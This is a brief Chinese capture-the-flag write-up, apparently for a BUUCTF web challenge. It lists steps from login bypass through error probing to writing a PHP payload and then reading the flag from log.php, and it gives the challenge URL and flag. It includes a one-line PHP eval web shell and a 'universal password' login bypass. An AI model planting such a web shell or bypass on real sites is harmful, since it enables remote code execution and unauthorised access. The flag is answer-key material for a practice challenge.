1.已知账号密码,可SSH连接进行代码审计。
2.登录可万能密码 进入,也可注册 后登录。
3.修改url参数,发现报错。确定为Linux系统
4.写入一句话,并提交。(也可以文件上传,这里采用简洁的方法)
<?php phpinfo();?> //写入这个,在日志log.php可查看flag
<?php eval($_REQUEST[123]);?>
5.访问log.php日志文件,发现里面有flag
http://efbc89f9-f04d-4204-b60b-65777640d4ef.node5.buuoj.cn:81/log.php
flag{399aa672-cf2d-4aca-9bec-693be96a9083}注:如果没有,可以在前面一句话处填写 <?php phpinfo();?> 并提交。